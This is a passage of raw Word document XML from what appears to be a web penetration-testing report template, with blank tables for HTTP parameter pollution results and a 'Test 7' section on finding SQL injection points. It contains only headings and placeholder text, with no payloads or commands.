          <w:p w14:paraId="4DEB52C0" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE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F59FE" w14:paraId="1C4F0E0F" w14:textId="77777777" w:rsidTr="00533881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3E9C925B" w14:textId="178D7B8B" w:rsidR="003F59FE" w:rsidRDefault="00126D2B" w:rsidP="0053388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26D2B"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 Input Fields Accepting Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17A77B10" w14:textId="15DA0733" w:rsidR="003F59FE" w:rsidRDefault="003F59FE" w:rsidP="00725128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F40191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126D2B" w:rsidRPr="00126D2B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>GET/POST Requests, Forms, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F40191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0F28CBAA" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00F40191" w:rsidRDefault="003F59FE" w:rsidP="00725128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2B19EABD" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRDefault="003F59FE" w:rsidP="00725128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3F59FE" w:rsidRPr="00C747D8" w14:paraId="5ED8D72A" w14:textId="77777777" w:rsidTr="00533881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1FDB0E2C" w14:textId="3C9F92C7" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="00646839" w:rsidP="0053388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46839">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server-Side HPP Test Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31BB74B8" w14:textId="39C73727" w:rsidR="003F59FE" w:rsidRDefault="003F59FE" w:rsidP="00725128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F40191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646839" w:rsidRPr="00646839">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Duplicate Parameter Handling: First/Last Value Used, Concatenation, Unexpected Behavior, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F40191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7F797C4C" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRDefault="003F59FE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2A27E6C" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE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F59FE" w:rsidRPr="00C747D8" w14:paraId="75515EC2" w14:textId="77777777" w:rsidTr="00533881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3FC34FAF" w14:textId="1C98C70B" w:rsidR="003F59FE" w:rsidRPr="001B15A5" w:rsidRDefault="00646839" w:rsidP="0053388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46839">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Three-Step Comparison Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31D36031" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRDefault="00AB2499" w:rsidP="00725128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 xml:space="preserve">[*List out </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB2499">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Observed Differences</w:t>
            </w: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3A86D58E" w14:textId="77777777" w:rsidR="00AB2499" w:rsidRDefault="00AB2499" w:rsidP="00725128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73562C72" w14:textId="77777777" w:rsidR="00AB2499" w:rsidRDefault="00AB2499" w:rsidP="00725128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42D4B5DB" w14:textId="726D67D9" w:rsidR="00AB2499" w:rsidRPr="00F40191" w:rsidRDefault="00AB2499" w:rsidP="00725128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3F59FE" w:rsidRPr="00C747D8" w14:paraId="5FF8A676" w14:textId="77777777" w:rsidTr="00533881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4DAD2E43" w14:textId="719D6BE9" w:rsidR="003F59FE" w:rsidRPr="00A67C6A" w:rsidRDefault="00AB2499" w:rsidP="0053388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B2499">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Client-Side HPP Test Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D4AEDD" w14:textId="77BDA508" w:rsidR="003F59FE" w:rsidRDefault="003F59FE" w:rsidP="00725128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E84A63" w:rsidRPr="00E84A63">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Duplicate Parameters Reflected in Responses? Yes/No, Observed Behavior in HTML/JS Attributes, Forms, XHR Requests, etc.</w:t>
            </w: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2A13540F" w14:textId="77777777" w:rsidR="00E84A63" w:rsidRDefault="00E84A63" w:rsidP="00725128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43D1BAD0" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00F40191" w:rsidRDefault="003F59FE" w:rsidP="00725128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3F59FE" w:rsidRPr="00C747D8" w14:paraId="2CFC4B8E" w14:textId="77777777" w:rsidTr="00533881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6116E218" w14:textId="6DBD53A4" w:rsidR="003F59FE" w:rsidRPr="00A67C6A" w:rsidRDefault="00E84A63" w:rsidP="0053388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84A63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Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45EC9BC5" w14:textId="1B2C3C93" w:rsidR="003F59FE" w:rsidRDefault="003F59FE" w:rsidP="00725128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DA01EF" w:rsidRPr="00DA01E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Input Validation Bypass, Security Filter Evasion, WAF Bypass, SQL Injection, XSS, etc.</w:t>
            </w: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2120A15F" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRDefault="003F59FE" w:rsidP="00725128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62CDBC1F" w14:textId="77777777" w:rsidR="00DA01EF" w:rsidRDefault="00DA01EF" w:rsidP="00725128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7BDB73F4" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRDefault="003F59FE" w:rsidP="00725128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3F59FE" w:rsidRPr="00C747D8" w14:paraId="66D4C289" w14:textId="77777777" w:rsidTr="00533881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5DC9F118" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="0053388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C747D8"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 Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="273311B1" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRDefault="003F59FE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D3A8352" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRDefault="003F59FE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8CCE0B0" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="007251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F59FE" w:rsidRPr="00C747D8" w14:paraId="1359F2FC" w14:textId="77777777" w:rsidTr="00533881">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2858" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B37F2B1" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="0053388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47D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502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C661982" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="003F59FE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="111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3ED8CAE" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="003F59FE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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B3AE42C" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="003F59FE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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D505AA8" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="003F59FE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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EB29D73" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="003F59FE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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54F0405" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="00725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290E9A45" w14:textId="77777777" w:rsidR="005F28EF" w:rsidRPr="00A51A96" w:rsidRDefault="005F28EF" w:rsidP="005F28EF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lastRenderedPageBreak/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28EF" w14:paraId="7F3C1E4A" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30410011" w14:textId="77777777" w:rsidR="005F28EF" w:rsidRDefault="005F28EF" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48AC4C17" w14:textId="77777777" w:rsidR="005F28EF" w:rsidRDefault="005F28EF" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14EFE5E0" w14:textId="77777777" w:rsidR="005F28EF" w:rsidRDefault="005F28EF" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52527BD8" w14:textId="77777777" w:rsidR="005F28EF" w:rsidRDefault="005F28EF" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="478E2016" w14:textId="77777777" w:rsidR="00BE36F5" w:rsidRDefault="00BE36F5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51C50DCB" w14:textId="77777777" w:rsidR="00BE36F5" w:rsidRDefault="00BE36F5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="461C212A" w14:textId="77777777" w:rsidR="00BE36F5" w:rsidRDefault="00BE36F5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A8B0D02" w14:textId="77777777" w:rsidR="00BE36F5" w:rsidRDefault="00BE36F5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4165F385" w14:textId="77777777" w:rsidR="005F28EF" w:rsidRDefault="005F28EF" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A64B45D" w14:textId="77777777" w:rsidR="00401D00" w:rsidRDefault="00401D00" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03440D70" w14:textId="1F5062F1" w:rsidR="00647E2B" w:rsidRDefault="00647E2B" w:rsidP="00647E2B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00647E2B">
        <w:t>Test 7: Detect and Exploit SQL Injection Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1664A36C" w14:textId="5462820C" w:rsidR="00FF5C8D" w:rsidRPr="00E93B73" w:rsidRDefault="00084DFB" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93B73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[*</w:t>
      </w:r>
      <w:r w:rsidR="00BE36F5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>This section will include various techniques for</w:t>
      </w:r>
      <w:r w:rsidR="002F0846">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F0846" w:rsidRPr="002F0846">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="002F0846">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="002F0846" w:rsidRPr="002F0846">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> web applications for SQL injection vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00D60D2C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E93B73" w:rsidRPr="00E93B73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F471348" w14:textId="77777777" w:rsidR="00E93B73" w:rsidRDefault="00E93B73" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A805CC" w:rsidRPr="00A51A96" w14:paraId="6D00E362" w14:textId="77777777" w:rsidTr="00742948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4F683D34" w14:textId="09CDF709" w:rsidR="00A805CC" w:rsidRPr="003C713F" w:rsidRDefault="00A805CC" w:rsidP="00725128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7.1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954272" w:rsidRPr="00954272">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Identify the Injection Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="157A9C3B" w14:textId="77777777" w:rsidR="00E93B73" w:rsidRPr="00C400CB" w:rsidRDefault="00E93B73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BC131F" w:rsidRPr="00BC131F" w14:paraId="07A14643" w14:textId="77777777" w:rsidTr="00C400C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7C83236" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00C400C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C131F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663B2FAF" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC13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C131F" w:rsidRPr="00BC131F" w14:paraId="7D64F1D8" w14:textId="77777777" w:rsidTr="00C400C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1112B37" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00C400C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C131F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1AB3C3A3" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC13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C131F" w:rsidRPr="00BC131F" w14:paraId="1C4AEA3E" w14:textId="77777777" w:rsidTr="00C400C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49EDD10" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00C400C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C131F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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D93705F" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC13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C131F" w:rsidRPr="00BC131F" w14:paraId="54A2D5CB" w14:textId="77777777" w:rsidTr="00C400C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1091E93" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00C400C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C131F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Identified List of Entry Points </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E69CE8" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="113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B1E5045" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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4FA19CB" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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9BC5976" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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9C0E01B" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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762364A" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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DC97D7D" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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5DFFEA0" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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D380E47" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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A887E94" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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16CC3DD" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC13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C131F" w:rsidRPr="00BC131F" w14:paraId="683EC2EC" w14:textId="77777777" w:rsidTr="00C400C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5F0A4CA" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00C400C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C131F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7BEE9D44" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="112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C142946" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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C8027BC" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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B81582C" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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C207A03" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC131F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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4F57964" w14:textId="77777777" w:rsidR="00BC131F" w:rsidRPr="00BC131F" w:rsidRDefault="00BC131F" w:rsidP="00BC13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7BB1C177" w14:textId="77777777" w:rsidR="00590F18" w:rsidRPr="00A51A96" w:rsidRDefault="00590F18" w:rsidP="00590F18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90F18" w14:paraId="0006201B" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D57E984" w14:textId="77777777" w:rsidR="00590F18" w:rsidRDefault="00590F18" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60A64D62" w14:textId="77777777" w:rsidR="00590F18" w:rsidRDefault="00590F18" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EC4F219" w14:textId="77777777" w:rsidR="00255DE2" w:rsidRDefault="00255DE2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="590FB00F" w14:textId="77777777" w:rsidR="00255DE2" w:rsidRDefault="00255DE2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66F3A01C" w14:textId="77777777" w:rsidR="00590F18" w:rsidRDefault="00590F18" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B524783" w14:textId="77777777" w:rsidR="00590F18" w:rsidRDefault="00590F18" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E8E314D" w14:textId="77777777" w:rsidR="00590F18" w:rsidRDefault="00590F18" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="441D12BE" w14:textId="77777777" w:rsidR="004A1E8E" w:rsidRDefault="004A1E8E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6868FF" w:rsidRPr="00A51A96" w14:paraId="6F096BC0" w14:textId="77777777" w:rsidTr="007E3C59">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3160F0FA" w14:textId="44C28040" w:rsidR="006868FF" w:rsidRPr="003C713F" w:rsidRDefault="006868FF" w:rsidP="00725128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7.2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4F12F6" w:rsidRPr="004F12F6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Identify the SQL Injectable Entry Points in the HTTP Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FDA2D2F" w14:textId="77777777" w:rsidR="00590F18" w:rsidRPr="00C400CB" w:rsidRDefault="00590F18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FA2EF9" w:rsidRPr="00FA2EF9" w14:paraId="4DE1AC45" w14:textId="77777777" w:rsidTr="007655A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1581F7E" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="007655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A2EF9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0CBD1BD7" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF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A2EF9" w:rsidRPr="00FA2EF9" w14:paraId="043971C9" w14:textId="77777777" w:rsidTr="007655A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59AB080" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="007655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A2EF9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7A720BBE" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF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A2EF9" w:rsidRPr="00FA2EF9" w14:paraId="73AB5D2F" w14:textId="77777777" w:rsidTr="007655A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ACEE5F1" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="007655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A2EF9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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E5811AF" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF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A2EF9" w:rsidRPr="00FA2EF9" w14:paraId="397B3B9C" w14:textId="77777777" w:rsidTr="007655A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022C286" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="007655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A2EF9"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 List of SQL Injection Points in the HTTP Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="208D3844" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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4B45B46" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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61E6CB6" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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83D6B9F" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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7565CA6" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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72D1464" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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773E9C3" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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4DBC8D6" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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EB4A244" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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93CED40" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00202F16">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
